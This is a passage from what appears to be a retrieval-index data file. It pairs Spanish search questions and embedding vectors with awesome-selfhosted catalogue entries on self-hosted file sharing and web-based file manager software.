-0.05528, 0.00481, 0.04727, 0.0244, -0.1098, -0.05106, -0.04784, -0.06591, 0.05046, -0.05199, -0.02622, -0.08516, 0.0661, 0.01556, -0.03476, -0.03573, 0.01478, -0.01102, -0.14812, -0.06776, -0.01715, -0.10896, -0.0107, 0.00416, 0.01845, 0.03838, 0.01161, 0.02237, 0.03217, -0.12116, -0.01876, -0.00918, -0.03894, 0.07176, 0.00792, -0.02667, -0.07138, -0.05193, 0.03322, 0.0034, -0.01322, 0.00989, 0.0068, 0.02396, 0.03458, -0.11444, 0.11181, 0.0428, -0.05929, -0.06925, -0.02601, -0.0225, -0.02123, -0.04574, 0.04947, 0.02065, -0.04328, -0.00425, 0.05066, -0.00325, 0.00285, 0.07075, -0.0216, -0.01654, -0.09279, 0.01222, -0.0147, 0.05198, 0.00155, 0.03438, -0.03808, 0.00515, -0.00901, -0.0817, -0.04161, 0.06853, 0.05341, -0.04131, 0.00095, -0.0287, 0.03666, -0.02649, -0.0237, 0.01325, 0.07528, -0.08805, 0.02422, 0.06515, 0.01312, 0.02296, 0.02516, 0.03154, -0.05046, 0.05388, 0.12315, 0.04794, 0.04062, 0.04451, 0.04816, -0.00823, -0.03621, 0.03812, -0.08622, 0.05596, 0.04829, -0.01147, 0.0893, 0.04002, 0.03322, 0.05368, -0.03738, -0.02193, 0.00765, 0.06763, 0.01541, -0.05303, -0.07561, -0.02878, -0.00032, -0.03239, 0.01513, -0.05557, -0.05458, 0.04749, -0.01605, 0.04096, -0.01165, 0.00329]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: sE2EEnd β€” End-to-end encrypted file sharing with password protection, download limits, and auto-expiration, integrated with Keycloak for authentication [AGPL-3.0, Docker]. Sharry β€” Share files easily over the internet between authenticated and anonymous users (both ways) with resumable up- and downloads [GPL-3.0, Scala/Java/deb/Docker]. Shifter β€” A simple, self-hosted file-sharing web app, powered by Django [MIT, Docker]. Slink β€” Image sharing platform designed to give users complete control over their media sharing experience [AGPL-3.0, Docker]. snowshare β€” File and link sharing platform with URL shortening, code snippet sharing, and file uploads, featuring customizable expiration, privacy settings, and QR codes [CC0-1.0, Nodejs/Docker]. transfer.sh β€” Easy file sharing from the command line [MIT, Go]. Uguu β€” Stores files and deletes after X amount of time [MIT, PHP].", "indexar": "cual es una alternativa libre al servicio de transferencia de archivos que permita encriptaciΓ³n de extremo a extremo?", "v": [-0.07402, 0.02615, -0.07729, -0.07779, -0.01404, -0.10747, -0.02596, -0.00215, -0.11675, -0.04192, -0.06806, -0.18644, 0.01133, 0.00518, 0.13336, -0.0884, 0.02975, -0.02816, 0.1625, -0.0244, -0.0251, -0.06553, 0.02797, -0.1069, -0.07492, -0.06484, -0.0437, 0.12737, -0.12669, 0.03648, 0.04966, 0.02903, 0.12654, -0.01915, 0.10874, 0.00793, 0.0726, 0.12643, 0.0422, 0.07288, 0.08436, -0.13062, -0.01005, 0.08485, -0.05098, -0.11333, -0.07341, 0.11589, 0.09251, 0.01293, -0.05305, -0.1336, -0.19435, 0.00705, -0.03036, 0.05648, 0.06437, -0.19723, -0.05899, -0.02476, -0.02892, 0.08647, -0.03117, -0.00308, 0.06627, -0.0049, -0.15746, 0.027, -0.17415, 0.10389, 0.08511, -0.00818, -0.02122, 0.03053, -0.08493, 0.03964, -0.08856, 0.00548, -0.0608, 0.07118, 0.03415, 0.00848, -0.01081, 0.00964, -0.12048, -0.01239, 0.04529, -0.01248, 0.05684, 0.08174, 0.07331, 0.06207, -0.02385, 0.05358, 0.02263, -0.08663, -0.04848, 0.00755, 0.00622, 0.01208, 0.0908, 0.11412, -0.09133, 0.04835, 0.00757, 0.02313, -0.00792, -0.01206, 0.01725, -0.05961, 0.01228, 0.08386, 0.03725, 0.00317, -0.05216, -0.07136, -0.05014, -0.0245, 0.0176, -0.06413, -0.05549, -0.01862, 0.02124, -0.03299, 0.00499, -0.00147, -0.07366, 0.04928, -0.05602, 0.02759, -0.01526, -0.01835, -0.09377, -0.00551, -0.08093, -0.01677, 0.09825, -0.00115, 0.02118, -0.0201, 0.02203, 0.03295, -0.0379, -0.01266, 0.06083, -0.0464, -0.01635, -0.06954, -0.03833, -0.03141, -0.09747, 0.04247, -0.02044, 0.08088, -0.08246, 0.02378, -0.05098, -0.14018, -0.10184, 0.0739, 0.01811, 0.02114, 0.001, 0.00753, -0.10526, -0.02293, 0.07293, 0.04454, -0.0574, -0.08378, -0.02285, 0.01437, -0.02465, -0.06263, 0.06704, -0.0403, -0.03861, -0.10948, 0.03769, -0.04239, 0.04485, -0.01316, -0.08186, -0.02845, 0.04872, -0.0085, 0.02828, 0.03996, -0.0234, 0.02761, -0.02848, -0.02868, -0.11229, -0.00499, -0.0387, -0.00456, -0.00735, 0.00233, -0.02426, -0.06209, -0.02855, -0.02496, -0.00665, 0.02921, -0.02633, -0.00874, -0.07567, 0.00238, -0.04233, 0.05929, 0.0653, -0.00377, 0.10145, -0.04037, -0.02563, -0.01247, 0.00241, -0.01074, -0.03141, 0.02293, 0.06375, -0.03809, 0.02112, -0.00758, -0.00372, 0.0184, 0.03448, 0.02369, -0.00947, -0.00632, -0.01449, 0.08863, -0.03968, 0.0236, 0.08583, 0.03016, -0.06404, -0.00864, 0.01729, -0.06973, 0.01197, 0.09283, -0.0618, -0.03906, -0.02928, 0.03355, -0.0987, -0.02103, 0.01798, -0.03625, 0.00747, 0.05754, 0.01325, -0.03955, 0.08465, -0.00447]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: XBackBone β€” A simple, fast and lightweight file manager with instant sharing tools integration, like ShareX (a free and open-source screenshot utility for Windows) [AGPL-3.0, PHP/Docker]. Zipline β€” A lightweight, fast and reliable file sharing server that is commonly used with ShareX, offering a react-based Web UI and fast API [MIT, Docker/Nodejs].", "indexar": "con que puedo montar un servidor de transferencia de archivos rΓ‘pido y ligero?", "v": [0.04375, 0.0259, -0.21001, -0.18228, -0.15444, -0.04495, 0.0196, 0.01788, -0.07309, -0.06781, -0.07613, -0.08425, 0.13849, -0.0578, 0.09807, 0.08738, 0.11639, -0.02694, 0.06923, -0.0167, 0.02727, 0.016, 0.0819, -0.11805, -0.00501, 0.04849, 0.07617, 0.015, -0.15134, -0.01083, -0.00306, 0.05204, 0.09003, 0.11266, 0.07171, -0.06728, 0.04253, 0.18298, -0.05468, 0.05282, 0.10512, -0.00955, -0.03207, 0.04614, -0.02319, -0.07679, 0.10351, -0.03354, 0.11628, -0.01064, 0.06701, -0.05606, -0.11721, -0.01394, -0.15872, 0.05669, 0.07109, -0.15278, 0.11415, -0.01902, -0.07625, 0.10403, -0.09097, -0.01648, 0.04064, 0.03001, -0.09152, -0.03085, -0.18234, -0.01893, 0.00485, 0.01296, 0.03544, -0.01084, -0.05292, 0.07278, -0.0429, -0.00951, 0.00281, 0.0952, 0.05991, 0.02092, 0.00828, 0.09509, -0.08026, -0.06916, -0.01912, -0.05411, 0.15184, 0.09, 0.07974, 0.05482, 0.00656, 0.03265, 0.0307, -0.07532, 0.04421, 0.00277, 0.00044, -0.03549, -0.02941, 0.10091, -0.03317, 0.1393, 0.06619, 0.09512, 0.09647, -0.02982, 0.06038, -0.07421, 0.096, 0.02218, -0.00558, 0.04918, -0.07133, -0.04612, 0.01558, 0.02299, -0.04486, 0.06422, -0.04732, 0.00758, 0.08679, 0.02933, 0.02263, -0.09683, 0.07013, 0.06561, -0.07991, 0.02121, -0.00333, -0.01483, -0.11343, -0.02236, -0.03814, 0.01559, 0.04873, -0.01104, -0.02931, -0.04963, 0.05959, -0.04011, -0.04968, -0.00245, 0.07056, 0.008, 0.05395, -0.12972, -0.04803, -0.0131, 0.04566, -0.01928, -0.01926, -0.04514, -0.08738, -0.05523, 0.03225, -0.09338, -0.07791, 0.01528, 0.01556, 0.10735, 0.02738, 0.0411, -0.0547, -0.04086, 0.01117, 0.06032, 0.03207, 0.00923, -0.02318, 0.02857, -0.04052, -0.00384, 0.06333, 0.04419, -0.09213, -0.02769, 0.03855, -0.00681, 0.01091, 0.01273, -0.0445, 0.0362, -0.03569, -0.02157, 0.04029, 0.04365, -0.02613, 0.05808, 0.02773, 0.00315, -0.04091, 0.06857, 0.02867, -0.07443, -0.04023, 0.01556, -0.02654, -0.05416, 0.02121, -0.08766, 0.00016, -0.00533, -0.01798, -0.04958, -0.05487, 0.06806, -0.00497, 0.02594, -0.02946, 0.0087, 0.14936, -0.06107, 0.01952, 0.01962, -0.00105, -0.06602, -0.01612, 0.00835, 0.02222, -0.01012, 0.00984, 0.02825, -7e-05, 0.03996, -0.01829, -0.05111, 0.0326, -0.01165, -0.03767, 0.07897, -0.01457, -0.02597, 0.05158, 0.02416, -0.0289, -0.04697, -0.03364, 0.00384, 0.03393, 0.05365, -0.00962, -0.02276, -0.03434, 0.00852, -0.03442, -0.02688, -0.01663, -0.02975, -0.00735, -0.02501, 0.01712, -0.0198, 0.0123, -0.01153]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: XBackBone β€” A simple, fast and lightweight file manager with instant sharing tools integration, like ShareX (a free and open-source screenshot utility for Windows) [AGPL-3.0, PHP/Docker]. Zipline β€” A lightweight, fast and reliable file sharing server that is commonly used with ShareX, offering a react-based Web UI and fast API [MIT, Docker/Nodejs].", "indexar": "que alternativa libre hay para compartir archivos instantΓ‘neamente con una interfaz web?", "v": [0.17814, 0.11467, -0.06637, -0.12167, 0.01005, -0.05793, -0.10414, -0.04669, -0.07172, 0.02241, 0.02912, -0.14654, -0.06086, 0.08755, 0.08192, 0.10032, 0.14927, 0.01076, 0.10896, -0.12291, -0.05837, 0.08956, -0.14485, -0.0965, -0.06278, -0.12563, -0.07198, 0.07773, -0.06905, -0.0236, -0.05472, -0.09131, 0.09435, 0.07387, -0.06438, -0.03318, 0.1712, 0.15386, 0.03352, -0.09875, 0.05402, 0.03973, -0.06028, 0.14812, 0.01647, -0.02886, -0.10182, -0.00713, 0.03477, 0.06794, -0.02252, -0.06771, -0.02617, 0.07554, -0.03064, 0.00104, 0.16178, -0.19895, -0.038, -0.00953, -0.12166, 0.16529, -0.07713, -0.00375, 0.01366, 0.05236, -0.12231, 0.06409, -0.07558, 0.17274, 0.08198, 0.03294, 0.0686, -0.01414, -0.07814, 0.06833, -0.11133, -0.03049, -0.03378, 0.06336, 0.11599, -0.05965, 0.08447, 0.06117, 0.02022, -0.04837, 0.06996, -0.09141, -0.01053, 0.05175, 0.09176, 0.00482, 0.01183, 0.01697, 0.00505, -0.10913, 0.02097, 0.04253, 0.01985, -0.03181, 0.00324, 0.01612, -0.11505, 0.03631, 0.01493, -0.03555, -0.04219, 0.05739, -0.11352, 0.03872, 0.08248, 0.0546, 0.07001, 0.04749, -0.04556, -0.00152, -0.01048, -0.00753, -0.00651, -0.04876, 0.00932, 0.00397, -0.01077, -0.03255, -0.03164, 0.04347, -0.00352, 0.08735, -0.06378, 0.05228, 0.03595, -0.05981, -0.07964, -0.10553, -0.08294, 0.01904, 0.03961, -0.03217, 0.00862, -0.08118, 0.03665, -0.02453, -0.03483, -0.00781, -0.00571, 0.00499, -0.00078, -0.0534, -0.03974, -0.05492, -0.04962, -0.03719, -0.03597, -0.00774, -0.02512, -0.00238, -0.06411, -0.0469, -0.10399, -0.00405, -0.03852, -0.00466, -0.02947, 0.04464, -0.01449, -0.05685, -0.04887, 0.02041, -0.02005, -0.00315, 0.04952, 0.10001, 0.03763, -0.08012, 0.02099, 0.09055, 0.01477, -0.08756, 0.0117, -0.06707, 0.02591, -0.02204, -0.05282, 0.0519, -0.04371, -0.06354, 0.01169, 0.07795, -0.05848, 0.07117, -0.02686, 0.03477, -0.03777, 0.03036, 0.04325, 0.0187, -0.03515, -0.01168, -0.01093, -0.001, -0.02018, -0.05187, 0.00818, -0.0071, -0.04129, -0.02221, -0.00713, 0.01674, 0.04751, 0.01056, -0.01731, 0.01871, 0.08013, -0.01609, -0.02131, 0.02987, 0.05121, -0.01855, 0.02878, -0.06736, 0.05002, 0.02136, -0.00049, 0.01817, 0.04374, 0.02442, -0.03669, 0.00226, -0.0198, -0.00987, -0.02122, -0.00868, 0.00058, 0.00721, 0.01347, -0.02084, -0.02724, -0.01051, 0.01201, -0.03737, -0.01516, 0.01807, -0.00708, 0.02278, -0.06157, 0.00344, -0.06875, -0.04035, -0.00908, -0.04504, -0.02785, -0.02577, 0.01593, 0.06532, -0.03458, 0.04575]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: XBackBone β€” A simple, fast and lightweight file manager with instant sharing tools integration, like ShareX (a free and open-source screenshot utility for Windows) [AGPL-3.0, PHP/Docker]. Zipline β€” A lightweight, fast and reliable file sharing server that is commonly used with ShareX, offering a react-based Web UI and fast API [MIT, Docker/Nodejs].", "indexar": "cual es la mejor herramienta para integrar funciones como capturas de pantalla en un gestor de archivos sencillo?", "v": [0.03971, 0.03695, -0.14165, -0.25969, -0.00725, -0.16552, -0.0268, 0.00145, -0.01248, -0.03331, -0.04004, 0.00934, -0.04089, -0.00166, 0.08905, 0.02603, 0.07123, -0.15684, -0.04036, -0.01679, -0.11662, 0.0979, 0.00439, -0.10189, -0.12516, -0.03456, 0.02821, 0.0116, -0.1221, -0.06848, 0.01671, -0.02073, 0.08028, -0.10342, -0.10251, -0.07263, -0.05037, 0.0821, -0.05975, 0.09142, -0.03643, 0.06141, -0.12051, 0.0765, 0.03516, -0.05158, 0.11475, -0.02242, 0.03552, -0.00631, -0.06815, -0.05959, -0.02856, 0.05937, -0.04441, -0.14196, 0.10944, -0.13404, 0.04242, -0.06404, -0.09047, 0.07706, -0.08439, 0.02314, -0.08252, -0.02202, -0.00643, 0.01806, -0.02751, 0.07823, 0.05912, 0.12163, 0.03088, 0.1068, -0.01481, 0.08703, -0.03834, -0.03846, -0.02386, -0.02259, 0.06805, -0.12126, -0.14634, 0.01337, -0.08391, -0.07402, 0.02177, -0.08703, -0.05463, -0.11092, 0.06495, -0.04594, -0.02752, 0.02321, -0.01318, -0.00497, 0.04513, 0.04135, -0.03255, 0.00242, 0.07503, -0.12589, -0.07794, 0.14168, -0.02613, 0.08765, -0.02421, -0.01071, -0.08411, -0.0736, 0.00409, 0.05091, -0.00577, 0.104, -0.06823, 0.08817, -0.00564, -0.1126, 0.00061, -0.06933, -0.02451, -0.00162, -0.04098, -0.09755, 0.11408, 0.02585, 0.04663, 0.07413, 0.02189, 0.01611, 0.00335, -0.02102, -0.07111, 0.07478, -0.09125, -0.01038, 0.10529, -0.041, -0.05651, -0.0959, -0.01705, 0.0156, 0.05388, -0.12594, 0.12406, 0.0453, 0.0645, -0.00175, -0.04698, 0.07206, 0.07334, -0.04714, -0.02488, 0.01163, 0.01416, 0.04164, -0.03008, -0.08585, -0.08159, -0.02399, -0.01061, -0.08851, -0.04631, 0.04283, -0.01328, -0.10714, -0.00277, 0.01499, 0.05138, 0.02625, 0.03687, 0.05304, 0.04748, -0.07621, -0.07082, -0.02471, -0.0217, -0.00796, 0.0545, -0.08185, -0.02036, 0.05052, -0.00093, 0.00775, 0.04389, -0.06662, -0.03355, 0.01311, -0.02593, 0.04792, 0.05117, -0.00393, -0.0544, -0.05589, 0.0144, -0.02355, -0.06495, -0.01716, 0.02022, -0.00754, 0.00557, -0.08881, -0.00235, -0.03267, 0.01883, 0.04606, -0.04439, 0.05706, 0.00262, -0.00333, -0.03304, 0.06198, 0.05178, -0.01409, 0.03226, -0.07723, 0.0627, -0.00774, 0.01994, 0.02466, 0.00657, 0.00753, 0.04397, 0.04279, -0.02365, 0.02036, -0.00991, 0.02123, -0.03558, -0.04933, -0.02207, -0.00021, 0.00339, -0.01582, 0.00829, -0.01556, 0.02016, -0.05968, -0.02615, -0.0623, 0.01512, 0.04186, 0.00169, 0.00328, -0.0626, -0.02084, -0.0217, 0.00719, 0.01529, -0.10399, -0.01983, 0.01424, 0.06556, 0.02203, 0.00712, -0.02326]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Apaxy β€” Theme built to enhance the experience of browsing web directories, using the mod_autoindex Apache module and some CSS to override the default style of a directory listing [GPL-3.0, Javascript]. ClyoCloud β€” A personal, self-hosted cloud storage and media management application built for privacy, efficiency, and aesthetics [AGPL-3.0, Nodejs]. copyparty β€” Portable file server with accelerated resumable uploads, deduplication, WebDAV, FTP, zeroconf, media indexer, video thumbnails, audio transcoding, and write-only folders, in a single file with no mandatory dependencies [MIT, Python]. Directory Lister β€” Simple PHP based directory lister that lists a directory and all its sub-directories and allows you to navigate there within [MIT, PHP/Docker]. filebrowser β€” Web File Browser with a Material Design web interface [Apache-2.0, Go]. FileGator β€” FileGator is a powerful multi-user file manager with a single page front-end [MIT, PHP/Docker].", "indexar": "que programa hay para gestionar archivos en la nube de forma privada y estΓ©ticamente agradable?", "v": [-0.06603, -0.09051, -0.11798, -0.2021, -0.00336, -0.05333, -0.07226, 0.00191, -0.10831, -0.16734, -0.05293, -0.03263, 0.00565, 0.02749, -0.04004, -0.04198, 0.14038, -0.11997, 0.0182, 0.12505, -0.09177, 0.09692, -0.08871, -0.00122, -0.14807, -0.02636, 0.09124, 0.07457, 0.00429, 0.13779, 0.00103, 0.00814, 0.00662, -0.11974, 0.01814, 0.09756, 0.08351, -0.07693, -0.12679, -0.01652, 0.03541, -0.01625, 0.00553, 0.19621, 0.08147, -0.03396, 0.04554, 0.00499, 0.05459, 0.02941, -0.09732, 0.02141, 0.06029, 0.06985, 0.14427, -0.04397, -0.095, -0.11043, -0.02745, -0.00468, -0.09515, 0.09594, -0.00979, 0.10209, -0.0041, -0.0174, 0.12244, 0.01597, -0.14733, 0.01782, 0.08549, 0.01001, 0.00529, 0.02164, -0.00302, -0.01284, 0.02385, 5e-05, -0.04433, -0.00409, -0.0283, 0.09515, -0.04446, 0.0427, -0.17262, -0.03452, -0.00356, -0.02285, -0.11992, 0.04482, 0.00085, -0.05677, 0.01345, -0.01497, -0.06218, 0.09443, 0.0213, 0.08986, -0.04775, 0.03839, 0.0564, 0.06142, -0.05569, 0.09508, -0.03526, 0.10141, 0.02493, -0.05815, 0.01198, 0.02433, -0.02267, -0.0079, 0.03135, 0.05283, -0.0706, -0.01631, 0.03011, -0.08504, -0.02609, -0.01749, -0.04573, -0.02869, -0.02689, -0.04277, 0.08062, 0.02054, -0.0502, 0.06459, -0.13758, 0.0811, -0.1112, 0.01644, 0.02549, 0.02023, -0.04165, -0.04338, -0.08843, -0.0758, 0.04979, -0.08099, 0.01726, 0.03416, 0.0302, 0.04609, 0.06764, -0.13236, 0.03152, -0.09325, 0.0603, 0.01051, 0.03365, 0.0069, -0.0317, 0.02028, -0.159, 0.06575, -0.03219, -0.03425, -0.08573, 0.00147, 0.01793, 0.07248, -0.08708, 0.0081, 0.04801, -0.05807, 0.00821, 0.04715, 0.03863, 0.05288, 0.03804, 0.02774, -0.04038, -0.04424, 0.02038, 0.13228, 0.05431, -0.11987, 0.07575, -0.00728, -0.0063, -0.01729, 0.06707, 0.05461, -0.06147, -0.04988, -0.06621, 0.08665, -0.04936, 0.0682, -0.02165, 0.00761, 0.00967, -0.00044, 0.04212, -0.02953, -0.06754, 0.01909, -0.03004, -0.01315, -0.05337, 0.00862, -0.01711, 0.00762, -0.02917, 0.04899, 0.01203, -0.00059, 0.07455, -0.0205, 0.01541, 0.01171, -0.02115, -0.05529, 0.03874, 0.04374, -0.0039, 0.0162, 0.05366, 0.00529, -0.05121, -0.06252, 0.02901, -0.00318, 0.01192, -0.04254, -0.02034, 0.09545, -0.00466, 0.00996, -0.0413, -0.01177, -0.01228, -0.02557, 0.03553, -0.02127, 0.00582, -0.03541, 0.01666, -0.06088, -0.02044, 0.02953, 0.00763, 0.04448, -0.06011, -0.00929, -0.05309, 0.02954, 0.00965, 0.02669, -0.00611, 0.04485, 0.02172, -0.01097, 0.04659, 0.06879]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Apaxy β€” Theme built to enhance the experience of browsing web directories, using the mod_autoindex Apache module and some CSS to override the default style of a directory listing [GPL-3.0, Javascript]. ClyoCloud β€” A personal, self-hosted cloud storage and media management application built for privacy, efficiency, and aesthetics [AGPL-3.0, Nodejs]. copyparty β€” Portable file server with accelerated resumable uploads, deduplication, WebDAV, FTP, zeroconf, media indexer, video thumbnails, audio transcoding, and write-only folders, in a single file with no mandatory dependencies [MIT, Python]. Directory Lister β€” Simple PHP based directory lister that lists a directory and all its sub-directories and allows you to navigate there within [MIT, PHP/Docker]. filebrowser β€” Web File Browser with a Material Design web interface [Apache-2.0, Go]. FileGator β€” FileGator is a powerful multi-user file manager with a single page front-end [MIT, PHP/Docker].", "indexar": "cual es una alternativa libre a los servidores de archivo que permita transmisiones parciales rΓ‘pidas y transcodimiento de video sin dependencias obligatorias?", "v": [0.18229, 0.0541, -0.02021, -0.03434, 0.07682, 0.02148, 0.11042, -0.06757, -0.01952, 0.05113, -0.01402, -0.08251, 0.05577, -0.00173, 0.09208, 0.04854, 0.13938, -0.007, 0.12355, -0.02939, 0.01767, -0.04175, -0.02692, -0.04428, 0.02957, -0.05032, -0.01392, -0.0369, -0.20028, -0.0731, 0.02767, 0.01454, 0.04571, -0.00412, 0.08532, -0.03396, -0.01204, 0.13455, -0.07685, 0.00012, 0.0555, 0.02154, -0.10095, -0.01002, -0.06881, -0.11992, -0.0692, 0.10599, -0.01283, 0.01869, -0.0518, 0.01236, -0.15023, -0.05075, -0.04688, -0.02455, 0.13498, -0.13912, -0.04531, 0.05473, -0.00681, 0.07636, 0.10431, -0.00977, 0.02639, -0.0024, 0.01893, -0.01944, -0.08722, 0.08962, -0.01645, 0.01162, 0.08097, -0.03203, -0.18203, 0.07891, -0.14164, -0.11389, 0.01317, 0.09819, 0.08062, -0.01962, -0.00126, 0.08109, -0.06164, -0.0583, -0.04699, -0.04184, 0.05044, -0.02465, 0.03905, 0.07954, 0.05039, 0.00708, 0.07411, -0.07602, -0.0266, 0.10387, 0.07267, 0.07014, 0.06811, 0.08319, -0.10459, 0.08998, -0.00102, 0.062, -0.00183, -0.0205, -0.01187, 0.03644, 0.09148, 0.05851, -0.03948, 0.00813, 0.05808, 0.03074, -0.06796, 0.00933, -0.04616, 0.07045, -0.06131, -0.01741, 0.06596, 0.00115, 0.00822, -0.1273, -0.00122, 0.02323, -0.01859, 0.02069, 0.02558, 0.01689, -0.0998, -0.11917, -0.05352, -0.07286, 0.14606, 0.07414, 0.01377, -0.03464, 0.05636, -0.05857, 0.01293, 0.04237, 0.01813, 0.04283, 0.04874, -0.07865, -0.10776, -0.01431, -0.09484, 0.01551, -0.05977, -0.00623, -0.04251, -0.00087, 0.0101, -0.14966, -0.07109, 0.06549, 0.0518, -0.02893, 0.05156, -0.0082, -0.04367, -0.02951, -0.04688, 0.0468, -0.05931, -0.01747, 0.02893, -0.00326, 0.00738, -0.10085, 0.00991, -0.0665, -0.05192, -0.04491, 0.09762, 0.01237, 0.02791, 0.05456, -0.07043, 0.07017, 0.02535, -0.05492, -0.04061, -0.04649, -0.0315, 0.04619, 0.05517, -0.03673, -0.1043, -0.02226, 0.02993, 0.01169, -0.08364, -0.06627, -0.04418, -0.00474, -0.08139, -0.07119, -0.05503, -0.06527, -0.04406, -0.01595, -0.02457, 0.07581, -0.02653, 0.05473, 0.02056, 0.03312, 0.08784, -0.08789, -0.02468, -0.01749, 0.04682, -0.0205, -0.02567, -0.00413, 0.06628, 0.04345, 0.07124, -0.027, 0.03, 0.07886, 0.08486, 0.06174, -0.01299, -0.02042, -0.02105, 0.07435, -0.02666, -0.02762, 0.04097, -0.00557, -0.03324, -0.00119, -0.02304, -0.08534, 0.07092, 0.06547, -0.01716, -0.01772, -0.07229, -0.0406, -0.0834, 0.01043, -0.03755, -0.08738, 0.02958, -0.02849, 0.03492, 0.00719, 0.02298, -0.01746]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Apaxy β€” Theme built to enhance the experience of browsing web directories, using the mod_autoindex Apache module and some CSS to override the default style of a directory listing [GPL-3.0, Javascript]. ClyoCloud β€” A personal, self-hosted cloud storage and media management application built for privacy, efficiency, and aesthetics [AGPL-3.0, Nodejs]. copyparty β€” Portable file server with accelerated resumable uploads, deduplication, WebDAV, FTP, zeroconf, media indexer, video thumbnails, audio transcoding, and write-only folders, in a single file with no mandatory dependencies [MIT, Python]. Directory Lister β€” Simple PHP based directory lister that lists a directory and all its sub-directories and allows you to navigate there within [MIT, PHP/Docker]. filebrowser β€” Web File Browser with a Material Design web interface [Apache-2.0, Go]. FileGator β€” FileGator is a powerful multi-user file manager with a single page front-end [MIT, PHP/Docker].", "indexar": "con quΓ© puedo montar un gestor web de directorios sencillo basado en PHP o Go?", "v": [-0.03026, 0.03791, -0.10932, -0.08874, -0.13767, 0.00193, 0.08169, -0.05335, -0.15148, -0.14352, -0.03768, 0.14355, -0.03465, -0.11657, 0.08486, -0.01571, 0.06671, -0.0972, -0.02244, -0.01748, -0.08421, 0.05616, 0.06664, -0.13694, -0.04803, 0.00911, 0.0314, -0.1032, -0.11664, -0.00657, 0.09668, -0.00378, -0.07258, -0.0233, -0.19601, 0.02763, 0.03129, 0.0126, -0.03156, 0.02657, -0.07382, -0.01344, -0.07252, 0.09745, -0.02737, -0.10373, 0.13196, -0.18345, 0.09262, -0.02676, 0.07666, -0.06678, -0.08905, 0.0059, -0.0185, 0.03615, 0.14181, -0.15699, 0.06824, 0.04226, -0.07754, -0.01355, -0.01733, 0.10124, -0.02826, 0.07277, 0.05646, 0.05599, -0.04971, 0.02808, -0.05245, 0.03161, -0.03189, 0.11145, 0.03971, 0.11277, 0.04787, -0.01051, -0.01643, -0.01555, 0.02944, -0.055, 0.0303, 0.02685, -0.1305, -0.12366, -0.00867, -0.13086, 0.05741, -0.06266, 0.11112, 0.02422, -0.06679, -0.02549, -0.12683, -0.07493, 0.0456, 0.02615, -0.05252, -0.06702, -0.08553, 0.01497, -0.03894, 0.10747, 0.15022, 0.06651, 0.11314, 0.06405, -0.08679, -0.07084, 0.02468, 0.00695, -0.0784, -0.03111, 0.0194, 0.01653, 0.01514, 0.06965, -0.05048, -0.04869, -0.00768, 0.00343, -0.06326, 0.09251, 0.09791, 0.04026, 0.10663, 0.09124, -0.00775, -0.02239, -0.01454, -0.09086, -0.06477, 0.03225, -0.02891, 0.18277, 0.03379, 0.02399, 0.04121, -0.02203, -0.08813, -0.01393, -0.01895, -0.0101, 0.05294, -0.04668, 0.01982, -0.05262, -0.02362, 0.03921, 0.03453, 0.00327, -0.00666, -0.02895, -0.10514, -0.06569, 0.05047, -0.01646, -0.0241, 0.00045, 0.01854, 0.02402, 0.00695, 0.02401, -0.03709, -0.02991, -0.1072, 0.00661, 0.07322, -0.00159, -0.02322, 0.07247, 0.0246, -0.05895, 0.02356, -0.01286, -0.0716, -0.07312, -0.01447, 0.00536, 0.03875, -0.00882, 0.00296, 0.07204, -0.04436, -0.03452, 0.02163, 0.05075, 0.00312, 0.02648, 0.06007, 0.03536, -0.01258, -0.00785, 0.08536, 0.00655, -0.0008, -0.04132, 0.00244, 0.0301, -0.04449, -0.03074, 0.05452, -0.03153, 0.02326, -0.0209, 0.00153, 0.06192, 0.01451, 0.02785, 0.00655, -0.02417, 0.03484, -0.02363, 0.04071, -0.01971, 0.02441, 0.00913, 0.00458, 0.01282, -0.03125, -0.00072, 0.05499, -0.0431, 0.01973, 0.02176, -0.02151, -0.01893, -0.01105, 0.06196, -0.06715, -0.05743, -0.01305, -0.06164, 0.01921, 0.01422, -0.03338, 0.02498, -0.07563, 0.0414, 